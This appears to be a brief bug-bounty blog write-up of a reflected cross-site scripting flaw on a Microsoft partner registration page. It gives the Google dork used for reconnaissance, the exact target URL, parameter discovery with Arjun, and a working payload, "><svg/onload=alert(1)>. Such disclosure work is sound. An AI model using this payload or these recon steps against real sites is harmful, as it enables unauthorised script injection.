Reflected XSS on Microsoft

Reflected XSS on Microsoft

Reflected XSS on Microsoft Bahasa Indonesia | English | Boso Jowo | Basa Sunda |

First I did a little search on the Microsoft domain using Google Dork below,

site:*.*.microsoft.com ext:php


After that, I got a registration page on the msftguestus.partners.extranet.microsoft.com domain,
URL:
https://msftguestus.partners.extranet.microsoft.com/guest/msft_a_guest_register.php?_browser=1


Then, I used Arjun to find the parameters on the page


I put the XSS Payloads one by one in the parameters Arjun displayed until the XSS fire up
Payloads:
"><svg/onload=alert(1)>



#HappyHacking

Related Post: